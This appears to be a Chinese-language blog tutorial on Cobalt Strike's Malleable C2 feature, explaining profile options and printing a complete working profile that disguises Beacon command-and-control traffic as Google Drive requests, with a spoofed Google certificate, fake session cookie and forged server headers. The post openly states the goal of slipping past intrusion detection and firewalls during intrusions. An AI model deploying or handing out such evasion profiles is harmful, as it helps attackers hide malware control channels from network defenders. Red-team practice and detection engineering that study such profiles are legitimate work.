CobaltStrike malleable C2 的使用
malleable的含义
英文 Malleable Command and Control
可扩展的命令和控制
Malleable C2 是一种特定的语言,主要用来控制 “Cobalt Strike Beacon”攻击载荷中的网络指针(网络参数)
使用malleable C2
./teasmserver [ip][password][/patch/profile]
malleable的作用
可以通过修改c2配置文件,更改beacon中 payload的属性、行为、通过框架修改这些配置文件的属性,伪造正常的通信的流量,实现一些ids 入侵检测防火墙的绕过。现在成熟的ids检测工具 都可以检测出Cobalt Strike 这些著名得商业渗透测试工具。在一些很严格的环境中,被检测出来基本上就很难继续深入进行渗透。
profiles配置文件的详解
选项关键词
jitter控制beacon的不稳定的抖动时间
maxdns 控制dns的最大访问次数
sleeptime 控制beacon的睡眠间隔时间
spawnto
uri 请求的url
useragent 每次攻击时的浏览器头信息
除了设置Malleable C2的选项外,还能增加任意的http头信息增加到beacon中进行交互通信。
增加任意指定的参数的命令
header "header" "value"
parameter "key" "value"
## Google Drive
#set https cert info
https-certificate {
set CN "*.google.com"; #Common Name
set O "Google Inc"; #Organization Name
set C "US"; #Country
set L "Mountain View"; #Locality
set ST "California"; #State or Province
set validity "365"; #Number of days the cert is valid for
}
#default Beacon sleep duration and jitter
set sleeptime "60000";
set jitter "20";
#default useragent for HTTP comms
set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";
#IP address used to indicate no tasks are available to DNS Beacon
set dns_idle "8.8.4.4";
#Force a sleep prior to each individual DNS request. (in milliseconds)
set dns_sleep "0";
#Maximum length of hostname when uploading data over DNS (0-255)
set maxdns "235";
http-get {
set uri "/viewerng/meta";
client {
header "Accept" "text/html,application/xml;*/*;";
header "Accept-Encoding" "gzip, deflate";
header "Host" "drive.google.com";
header "Cookie" "SID=KsY0f3fxIeBLQRn2wHMhgJvTkFbWZIEqNyABgX_nveBtm9LeEmsHn6I9OmYzpw;";
#session metadata
metadata {
base64url;
netbios;
base64url;
parameter "id";
}
parameter "u" "0";
}
server {
header "Content-Type" "application/json; charset=utf-8";
header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate";
header "Pragma" "no-cache";
header "Content-Disposition" "attachment; filename=\"json.txt\"; filename*=UTF-8''json.txt";
header "X-Content-Type-Options" "nosniff";
header "X-Frame-Options" "SAMEORIGIN";
header "X-XSS-Protection" "1; mode=block";
header "Server" "GSE";
header "Connection" "close";
#Beacon's tasks
output {
print;
}
}
}
http-post {
set uri "/viewersng/meta";
set verb "GET";
client {
header "Accept" "text/html,application/xml;*/*;";
header "Accept-Encoding" "gzip, deflate";
header "Host" "drive.google.com";
header "Cookie" "SID=KsY0f3fxIeBLQRn2wHMhgJvTkFbWZIEqNyABgX_nveBtm9LeEmsHn6I9OmYzpw;";
output {
base64url;
netbios;
base64url;
parameter "id";
}
#session ID
id {
parameter "u";
}
}
server {
header "Content-Type" "application/json; charset=utf-8";
header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate";
header "Pragma" "no-cache";
header "Content-Disposition" "attachment; filename=\"json.txt\"; filename*=UTF-8''json.txt";
header "X-Content-Type-Options" "nosniff";
header "X-Frame-Options" "SAMEORIGIN";
header "X-XSS-Protection" "1; mode=block";
header "Server" "GSE";
header "Connection" "close";
output {
print;
}
}
}
#change the stager server
http-stager {
server {
header "Content-Type" "application/json; charset=utf-8";
header "Cache-Control" "no-cache, no-store, max-age=0, must-revalidate";
header "Pragma" "no-cache";
}
}
c2lint的使用
c2lint的profiles的文件是否正确
绿色是正常 黄色是警告 红色是错误
像风一样,自由,追逐
浙公网安备 33010602011771号